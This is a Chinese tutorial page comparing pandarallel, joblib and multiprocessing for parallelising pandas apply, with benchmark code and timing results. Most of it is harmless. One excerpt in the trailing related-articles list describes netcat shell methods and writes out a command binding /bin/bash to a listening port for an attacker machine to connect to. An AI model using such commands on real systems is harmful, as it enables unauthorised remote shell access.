详解pandas apply 并行处理的几种方法

1. pandarallel (pip install )

对于一个带有Pandas DataFrame df的简单用例和一个应用func的函数,只需用parallel_apply替换经典的apply。

from pandarallel import pandarallel

# Initialization
pandarallel.initialize()

# Standard pandas apply
df.apply(func)

# Parallel apply
df.parallel_apply(func)

注意,如果不想并行化计算,仍然可以使用经典的apply方法。

另外可以通过在initialize函数中传递progress_bar=True来显示每个工作CPU的一个进度条。

2. joblib (pip install )

https://pypi.python.org/pypi/joblib

# Embarrassingly parallel helper: to make it easy to write readable parallel code and debug it quickly

from math import sqrt
from joblib import Parallel, delayed

def test():
  start = time.time()
  result1 = Parallel(n_jobs=1)(delayed(sqrt)(i**2) for i in range(10000))
  end = time.time()
  print(end-start)
  result2 = Parallel(n_jobs=8)(delayed(sqrt)(i**2) for i in range(10000))
  end2 = time.time()
  print(end2-end)

-------输出结果----------

0.4434356689453125
0.6346755027770996

3. multiprocessing

import multiprocessing as mp

with mp.Pool(mp.cpu_count()) as pool:
  df['newcol'] = pool.map(f, df['col'])
multiprocessing.cpu_count()

返回系统的CPU数量。

该数量不同于当前进程可以使用的CPU数量。可用的CPU数量可以由 len(os.sched_getaffinity(0)) 方法获得。

可能引发 NotImplementedError

参见os.cpu_count()

4. 几种方法性能比较

(1)代码

import sys
import time
import pandas as pd
import multiprocessing as mp
from joblib import Parallel, delayed
from pandarallel import pandarallel
from tqdm import tqdm, tqdm_notebook

def get_url_len(url):
  url_list = url.split(".")
  time.sleep(0.01) # 休眠0.01秒
  return len(url_list)

def test1(data):
  """
  不进行任何优化
  """
  start = time.time()
  data['len'] = data['url'].apply(get_url_len)
  end = time.time()
  cost_time = end - start
  res = sum(data['len'])
  print("res:{}, cost time:{}".format(res, cost_time))

def test_mp(data):
  """
  采用mp优化
  """
  start = time.time()
  with mp.Pool(mp.cpu_count()) as pool:
    data['len'] = pool.map(get_url_len, data['url'])
  end = time.time()
  cost_time = end - start
  res = sum(data['len'])
  print("test_mp \t res:{}, cost time:{}".format(res, cost_time))

def test_pandarallel(data):
  """
  采用pandarallel优化
  """
  start = time.time()
  pandarallel.initialize()
  data['len'] = data['url'].parallel_apply(get_url_len)
  end = time.time()
  cost_time = end - start
  res = sum(data['len'])
  print("test_pandarallel \t res:{}, cost time:{}".format(res, cost_time))

def test_delayed(data):
  """
  采用delayed优化
  """
  def key_func(subset):
    subset["len"] = subset["url"].apply(get_url_len)
    return subset

  start = time.time()
  data_grouped = data.groupby(data.index)
  # data_grouped 是一个可迭代的对象,那么就可以使用 tqdm 来可视化进度条
  results = Parallel(n_jobs=8)(delayed(key_func)(group) for name, group in tqdm(data_grouped))
  data = pd.concat(results)
  end = time.time()
  cost_time = end - start
  res = sum(data['len'])
  print("test_delayed \t res:{}, cost time:{}".format(res, cost_time))

if __name__ == '__main__':

  columns = ['title', 'url', 'pub_old', 'pub_new']
  temp = pd.read_csv("./input.csv", names=columns, nrows=10000)
  data = temp
  """
  for i in range(99):
    data = data.append(temp)
  """
  print(len(data))
  """
  test1(data)
  test_mp(data)
  test_pandarallel(data)
  """
  test_delayed(data)

(2) 结果输出

1k
res:4338, cost time:0.0018074512481689453
test_mp   res:4338, cost time:0.2626469135284424
test_pandarallel   res:4338, cost time:0.3467681407928467
 
1w
res:42936, cost time:0.008773326873779297
test_mp   res:42936, cost time:0.26111721992492676
test_pandarallel   res:42936, cost time:0.33237743377685547
 
10w
res:426742, cost time:0.07944369316101074
test_mp   res:426742, cost time:0.294996976852417
test_pandarallel   res:426742, cost time:0.39208269119262695
 
100w
res:4267420, cost time:0.8074917793273926
test_mp   res:4267420, cost time:0.9741342067718506
test_pandarallel   res:4267420, cost time:0.6779992580413818
 
1000w
res:42674200, cost time:8.027287006378174
test_mp   res:42674200, cost time:7.751036882400513
test_pandarallel   res:42674200, cost time:4.404983282089233

在get_url_len函数里加个sleep语句(模拟复杂逻辑),数据量为1k,运行结果如下:

1k
res:4338, cost time:10.054503679275513
test_mp   res:4338, cost time:0.35697126388549805
test_pandarallel   res:4338, cost time:0.43415403366088867
test_delayed   res:4338, cost time:2.294757843017578

5. 小结

(1)如果数据量比较少,并行处理比单次执行效率更慢;

(2)如果apply的函数逻辑简单,并行处理比单次执行效率更慢。

6. 问题及解决方法

(1)ImportError: This platform lacks a functioning sem_open implementation, therefore, the required synchronization primitives needed will not function, see issue 3770.

https://www.jianshu.com/p/0be1b4b27bde

(2)Linux查看物理CPU个数、核数、逻辑CPU个数

https://lover.blog.csdn.net/article/details/113951192

(3) 进度条的使用

https://www.jb51.net/article/206219.htm

到此这篇关于详解pandas apply 并行处理的几种方法的文章就介绍到这了,更多相关pandas apply 并行处理内容请搜索我们以前的文章或继续浏览下面的相关文章希望大家以后多多支持我们!

(0)

相关推荐

  • 详谈pandas中agg函数和apply函数的区别

    在利用python进行数据分析 这本书中其实没有明确表明这两个函数的却别,而是说apply更一般化. 其实在这本书的第九章'数组及运算和转换'点到了两者的一点点区别:agg是用来聚合运算的,所谓的聚合当然是合成的成分比较大些,这一节开头就点到了:聚合只不过是分组运算的其中一种而已.它是数据转换的一个特例,也就是说,它接受能够将一维数组简化为标量值的函数. 当然这两个函数都是作用在groupby对象上的,也就是分完组的对象上的,分完组之后针对某一组,如果值是一维数组,在利用完特定的函数之后,能做到

  • pandas apply多线程实现代码

    一.多线程化选择 并行化一个代码有两大选择:multithread 和 multiprocess. Multithread,多线程,同一个进程(process)可以开启多个线程执行计算.每个线程代表了一个 CPU 核心,这么多线程可以访问同样的内存地址(所谓共享内存),实现了线程之间的通讯,算是最简单的并行模型. Multiprocess,多进程,则相当于同时开启多个 Python 解释器,每个解释器有自己独有的数据,自然不会有数据冲突. 二.并行化思想 并行化的基本思路是把 dataframe

  • 对pandas中apply函数的用法详解

    最近在使用apply函数,总结一下用法. apply函数可以对DataFrame对象进行操作,既可以作用于一行或者一列的元素,也可以作用于单个元素. 例:列元素 行元素 列 行 以上这篇对pandas中apply函数的用法详解就是小编分享给大家的全部内容了,希望能给大家一个参考,也希望大家多多支持我们. 您可能感兴趣的文章: 浅谈Pandas中map, applymap and apply的区别

  • Pandas对每个分组应用apply函数的实现

    Pandas的apply函数概念(图解) 实例1:怎样对数值按分组的归一化 实例2:怎样取每个分组的TOPN数据 到此这篇关于Pandas对每个分组应用apply函数的实现的文章就介绍到这了,更多相关Pandas 应用apply函数内容请搜索我们以前的文章或继续浏览下面的相关文章希望大家以后多多支持我们!

  • pandas apply 函数 实现多进程的示例讲解

    前言: 在进行数据处理的时候,我们经常会用到 pandas .但是 pandas 本身好像并没有提供多进程的机制.本文将介绍如何来自己实现 pandas (apply 函数)的多进程执行.其中,我们主要借助 joblib库,这个库为python 提供了一个非常简洁方便的多进程实现方法. 所以,本文将按照下面的安排展开,前面可能比较啰嗦,若只是想知道怎么用可直接看第三部分: - 首先简单介绍 pandas 中的分组聚合操作 groupby. - 然后简单介绍 joblib 的使用方法. - 最后,

  • Pandas的Apply函数具体使用

    Pandas最好用的函数 Pandas是Python语言中非常好用的一种数据结构包,包含了许多有用的数据操作方法.而且很多算法相关的库函数的输入数据结构都要求是pandas数据,或者有该数据的接口. 仔细看pandas的API说明文档,就会发现有好多有用的函数,比如非常常用的文件的读写函数就包括如下函数: Format Type Data Description Reader Writer text CSV read_csv to_csv text JSON read_json to_json

  • pandas 使用apply同时处理两列数据的方法

    多的不说,看了代码就懂了! df = pd.DataFrame ({'a' : np.random.randn(6), 'b' : ['foo', 'bar'] * 3, 'c' : np.random.randn(6)}) def my_test(a, b): return a + b df['Value'] = df.apply(lambda row: my_test(row['a'], row['c']), axis=1) print df 以上这篇pandas 使用apply同时处理两列

  • 详解pandas apply 并行处理的几种方法

    1. pandarallel (pip install ) 对于一个带有Pandas DataFrame df的简单用例和一个应用func的函数,只需用parallel_apply替换经典的apply. from pandarallel import pandarallel # Initialization pandarallel.initialize() # Standard pandas apply df.apply(func) # Parallel apply df.parallel_ap

  • 详解Swift model 解析的两种方法

    详解Swift model 解析的两种方法 1. 常规解析方法 //懒加载声明一个LJNewsModel为数据的数组 lazy var ljArray : [LJNewsModel] = [LJNewsModel]() //MARK:-- 数据获取和解析 extension NewsViewController{ func requestNetData(){ /* 打印json数据 */ LJDownLoadNetImage.request("GET", url: "http

  • 详解pandas绘制矩阵散点图(scatter_matrix)的方法

    使用散点图矩阵图,可以两两发现特征之间的联系 pd.plotting.scatter_matrix(frame, alpha=0.5, c,figsize=None, ax=None, diagonal='hist', marker='.', density_kwds=None,hist_kwds=None, range_padding=0.05, **kwds) 1.frame,pandas dataframe对象 2.alpha, 图像透明度,一般取(0,1] 3.figsize,以英寸为单

  • 详解NC反弹shell的几种方法

    假如ubuntu.CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu.CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell. 需要目标机安装nc. 反向反弹shell 方法1:bash反弹 bash

  • 详解SpringBoot读取配置文件的N种方法

    我们在项目开发中经常会用到配置信息,例如数据库连接的帐号.密码等,而为了方便维护,我们通常将这些信息放到配置文件中.在需要用到这些配置信息时,可以通过代码获取.下面我们看看Spring中有哪些获取配置信息的方法. PropertiesLoaderUtils读取 通过ClassPathResource加载配置文件资源,结合PropertiesLoaderUtils类读取,源码如下: ClassPathResource resource = new ClassPathResource("applic

  • 详解Java停止线程的四种方法

    一.线程停止基础知识 interrupted(): 测试当前线程是否已经中断.该方法为静态方法,调用后会返回boolean值.不过调用之后会改变线程的状态,如果是中断状态调用的,调用之后会清除线程的中断状态. isInterrupted(): 测试线程是否已经中断.该方法由对象调用 interrupt(): 标记线程为中断状态,不过不会中断正在运行的线程. stop(): 暴力停止线程.已弃用. 二.停止线程方法1:异常法停止 线程调用interrupt()方法后,在线程的run方法中判断当前对

  • 详解PHP实现定时任务的五种方法

    定时运行任务对于一个网站来说,是一个比较重要的任务,比如定时发布文档,定时清理垃圾信息等,现在的网站大多数都是采用PHP动态语言开发的,而对于PHP的实现决定了它没有Java和.Net这种AppServer的概念,而http协议是一个无状态的协议,PHP只能被用户触发,被调用,调用后会自动退出内存,没有常驻内存. 如果非要PHP去实现定时任务, 可以有以下几种解决方案: 一. 简单直接不顾后果型 <?php ignore_user_abort();//关掉浏览器,PHP脚本也可以继续执行. se

  • 详解linux安装软件的几种方法

    一.rpm包安装方式步骤: 1.找到相应的软件包,比如soft.version.rpm,下载到本机某个目录: 2.打开一个终端,su -成root用户: 3.cd soft.version.rpm所在的目录: 4.输入rpm -ivh soft.version.rpm 详细介绍: 1. 安装: 我只需简单的一句话,就可以说完.执行: rpm –ivh rpm的软件包名 更高级的,请见下表: rpm参数 参数说明 -i 安装软件 -t 测试安装,不是真的安装 -p 显示安装进度 -f 忽略任何错误

  • 详解Python传入参数的几种方法

    Python传入参数的方法有:位置参数.默认参数.可变参数.关键字参数.和命名关键字参数.以及各种参数调用的组合 写在前面 Python唯一支持的参数传递方式是『共享传参』(call by sharing) 多数面向对象语言都采用这一模式,包括Ruby.Smalltalk和Java(Java的引用类型是这样,基本类型按值传递) 共享传参是指函数的各个形式参数获得实参中各个引用的副本:也就是说,函数内部的形参是实参的别名(alias) 这种方案的结果是,函数可能会修改作为参数传入的可变对象,但是无

  • 详解JavaScript类型判断的四种方法

    JavaScript有八种内置类型,除对象外,其他统称为"基本类型". 空值(null) 未定义(undefined) 布尔值(boolean) 数字(number) 字符串(string) 对象 (object) 符号(symbol, ES6中新增) 大整数(BigInt, ES2020 引入) Symbol: 是ES6中引入的一种原始数据类型,表示独一无二的值. BigInt:是 ES2020 引入的一种新的数据类型,用来解决 JavaScript中数字只能到 53 个二进制位(J

随机推荐